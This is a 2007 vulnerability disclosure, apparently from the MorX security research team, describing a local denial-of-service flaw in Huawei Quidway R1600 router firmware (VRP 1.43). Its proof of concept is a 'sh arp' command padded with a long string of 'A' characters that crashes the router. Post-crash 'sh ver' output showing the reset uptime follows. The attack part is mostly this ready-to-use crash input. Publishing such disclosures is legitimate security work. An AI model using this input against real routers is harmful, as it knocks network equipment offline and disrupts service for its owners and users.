Quidway Router Local DOS attack<br>By: Handrix <handrix_at_morx_org><br>18 January 2007<br>MorX security research team<br><a href="http://www.morx.org">www.morx.org</a><br><br><br>Description:<br>The Quidway Router's firmware is vulnerable to a local denial of service attack, there are a request to turn off the engine.
<br>Simple poc realeased by :<br><br>Router>sh arp AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
<br>AAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br><br>After the Router crash, wait a while and type "sh version" to verify this bug:
<br><br>Router>sh ver<br> VRP (tm) software, Version 1.43 2500E-003<br> Copyright (c) 1997-2002 HUAWEI TECH CO., LTD.<br> Compiled 20:53:47, Nov 7 2002 ,<br> Quidway R1600 uptime is 0 days 0 hours 1 minutes 3 seconds.
<br><br> Quidway R1600 with 1 68360 Processor<br> 16 Mbytes DRAM<br> 4608 Kbytes Flash Memory<br> hardware version is 1.0<br><br><br>Vendor: Huawei<br>Vulnerable version:<br>Quidway R1600 (Versatile Routing Platform, version
1.43 2500E-003)<br>Maybe others.<br><br>